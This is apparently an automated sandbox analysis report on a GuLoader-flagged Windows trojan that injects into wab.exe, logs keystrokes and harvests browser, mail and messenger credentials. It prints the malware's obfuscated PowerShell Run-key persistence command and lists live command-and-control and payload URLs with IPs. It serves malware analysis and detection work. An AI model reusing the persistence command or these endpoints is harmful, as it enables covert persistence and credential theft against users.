            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\itedxngwlibzmqlvhhlsguxrsq"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "mediates" /t reg_expand_sz /d "%linieringernes% -windowstyle minimized $localisers=(get-itemproperty -path 'hkcu:\officialvirksomhed\').pshaws;%linieringernes% ($localisers)"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "mediates" /t reg_expand_sz /d "%linieringernes% -windowstyle minimized $localisers=(get-itemproperty -path 'hkcu:\officialvirksomhed\').pshaws;%linieringernes% ($localisers)"Jump to behavior
            Source: wab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: wab.exeBinary or memory string: [2024/04/24 07:13:16 Offline Keylogger Started] [Program Manager] [Win]r [Run]
            Source: wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerl^
            Source: wab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: wab.exe, 00000008.00000002.3749985665.0000000004ECD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1699231813.0000000004EBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A02933 cpuid 8_2_20A02933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A02264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_20A02264
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,14_2_004082CD
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406072
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7500, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword14_2_004033F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7500, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7768, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7500, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Deobfuscate/Decode Files or Information
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            2
            Obfuscated Files or Information
            11
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts112
            Command and Scripting Interpreter
            Logon Script (Windows)212
            Process Injection
            1
            Software Packing
            2
            Credentials in Registry
            4
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            PowerShell
            Login Hook1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            1
            Credentials In Files
            29
            System Information Discovery
            Distributed Component Object Model11
            Input Capture
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Masquerading
            LSA Secrets41
            Security Software Discovery
            SSH2
            Clipboard Data
            113
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry
            Cached Domain Credentials41
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430778 Sample: #U0421#U041f#U0426 #U211613... Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 49 learfo55ozj01.duckdns.org 2->49 51 ricohltd.top 2->51 53 geoplugin.net 2->53 55 Snort IDS alert for network traffic 2->55 57 Multi AV Scanner detection for domain / URL 2->57 59 Antivirus detection for URL or domain 2->59 63 10 other signatures 2->63 10 #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe 7 43 2->10         started        signatures3 61 Uses dynamic DNS services 49->61 process4 file5 41 C:\Users\user\AppData\...ntreprenren.Out, ASCII 10->41 dropped 75 Suspicious powershell command line found 10->75 14 powershell.exe 18 10->14         started        signatures6 process7 signatures8 77 Obfuscated command line found 14->77 79 Writes to foreign memory regions 14->79 81 Found suspicious powershell code related to unpacking or dynamic code loading 14->81 17 wab.exe 5 15 14->17         started        22 conhost.exe 14->22         started        24 cmd.exe 1 14->24         started        process9 dnsIp10 43 learfo55ozj01.duckdns.org 193.222.96.21, 29871, 49713, 49714 SWISSCOMSwisscomSwitzerlandLtdCH Germany 17->43 45 ricohltd.top 104.21.60.38, 443, 49712 CLOUDFLARENETUS United States 17->45 47 geoplugin.net 178.237.33.50, 49715, 80 ATOM86-ASATOM86NL Netherlands 17->47 39 C:\Users\user\AppData\Roaming\mqerms.dat, data 17->39 dropped 65 Maps a DLL or memory area into another process 17->65 67 Installs a global keyboard hook 17->67 26 wab.exe 1 17->26         started        29 wab.exe 1 17->29         started        31 wab.exe 14 17->31         started        33 3 other processes 17->33 file11 signatures12 process13 signatures14 69 Tries to steal Instant Messenger accounts or passwords 26->69 71 Tries to harvest and steal browser information (history, passwords, etc) 26->71 73 Tries to steal Mail credentials (via file / registry access) 29->73 35 conhost.exe 33->35         started        37 reg.exe 1 1 33->37         started        process15

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe42%ReversingLabsWin32.Trojan.GuLoader
            #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe30%VirustotalBrowse
            #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe100%AviraHEUR/AGEN.1331786
            #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            learfo55ozj01.duckdns.org13%VirustotalBrowse
            geoplugin.net4%VirustotalBrowse
            ricohltd.top20%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://www.imvu.comr0%URL Reputationsafe
            http://www.imvu.comr0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://geoplugin.net/json.gp100%URL Reputationphishing
            https://contoso.com/0%URL Reputationsafe
            http://www.ebuddy.com0%URL Reputationsafe
            http://geoplugin.net/json.gpe0%Avira URL Cloudsafe
            http://geoplugin.net/json.gph0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpo0%Avira URL Cloudsafe
            http://www.imvu.coma0%Avira URL Cloudsafe
            https://ricohltd.top/;100%Avira URL Cloudmalware
            http://geoplugin.net/json.gph0%VirustotalBrowse
            http://geoplugin.net/json.gpo0%VirustotalBrowse
            http://geoplugin.net/json.gpe0%VirustotalBrowse
            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
            https://ricohltd.top/aCqwFQDQz144.bin5100%Avira URL Cloudmalware
            https://ricohltd.top/100%Avira URL Cloudmalware
            https://ricohltd.top/aCqwFQDQz144.bin100%Avira URL Cloudmalware
            http://geoplugin.net/json.gpL0%Avira URL Cloudsafe
            http://geoplugin.net/10%Avira URL Cloudsafe
            http://geoplugin.net/json.gpal0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpU0%Avira URL Cloudsafe
            https://ricohltd.top/19%VirustotalBrowse
            http://geoplugin.net/10%VirustotalBrowse
            http://geoplugin.net/json.gpal0%VirustotalBrowse
            https://ricohltd.top/aCqwFQDQz144.bin18%VirustotalBrowse
            http://geoplugin.net/json.gpU0%VirustotalBrowse
            http://geoplugin.net/json.gpL0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            learfo55ozj01.duckdns.org
            193.222.96.21
            truetrueunknown
            geoplugin.net
            178.237.33.50
            truefalseunknown
            ricohltd.top
            104.21.60.38
            truefalseunknown
            NameMaliciousAntivirus DetectionReputation
            http://geoplugin.net/json.gptrue
            • URL Reputation: phishing
            unknown
            https://ricohltd.top/aCqwFQDQz144.binfalse
            • 18%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1651324777.0000000006238000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://geoplugin.net/json.gphwab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.imvu.comrwab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://geoplugin.net/json.gpewab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1648736662.0000000005326000.00000004.00000800.00020000.00000000.sdmptrue
              • URL Reputation: malware
              • URL Reputation: malware
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1648736662.0000000005326000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://geoplugin.net/json.gpowab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000002.00000002.1651324777.0000000006238000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://ricohltd.top/;wab.exe, 00000008.00000002.3749797161.0000000004E55000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                http://www.imvu.comwab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1703163430.000000000357D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  high
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.1651324777.0000000006238000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.imvu.comawab.exe, 00000010.00000002.1703163430.000000000357D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.nirsoft.netwab.exe, 0000000D.00000002.1716385215.00000000009DF000.00000004.00000010.00020000.00000000.sdmpfalse
                    high
                    http://nsis.sf.net/NSIS_ErrorError#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exefalse
                      high
                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1648736662.0000000005326000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ricohltd.top/wab.exe, 00000008.00000002.3749797161.0000000004E55000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 19%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://ricohltd.top/aCqwFQDQz144.bin5wab.exe, 00000008.00000002.3749797161.0000000004E1E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://www.google.comwab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                          high
                          http://geoplugin.net/json.gpLwab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1648736662.00000000051D1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/powershell.exe, 00000002.00000002.1651324777.0000000006238000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1651324777.0000000006238000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://geoplugin.net/1wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://geoplugin.net/json.gpalwab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.google.com/accounts/serviceloginwab.exefalse
                                high
                                https://login.yahoo.com/config/loginwab.exe, wab.exe, 0000000D.00000002.1716875718.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://geoplugin.net/json.gpUwab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.nirsoft.net/wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1648736662.00000000051D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.ebuddy.comwab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.21.60.38
                                      ricohltd.topUnited States
                                      13335CLOUDFLARENETUSfalse
                                      178.237.33.50
                                      geoplugin.netNetherlands
                                      8455ATOM86-ASATOM86NLfalse
                                      193.222.96.21
                                      learfo55ozj01.duckdns.orgGermany
                                      3303SWISSCOMSwisscomSwitzerlandLtdCHtrue
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1430778
                                      Start date and time:2024-04-24 07:11:54 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 11m 3s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:20
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
                                      renamed because original name is a hash value
                                      Original Sample Name: 130 12.04.2024 ..exe
                                      Detection:MAL
                                      Classification:mal100.phis.troj.spyw.evad.winEXE@23/19@4/3
                                      EGA Information:
                                      • Successful, ratio: 80%
                                      HCA Information:
                                      • Successful, ratio: 96%
                                      • Number of executed functions: 222
                                      • Number of non-executed functions: 245
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 72.21.81.240
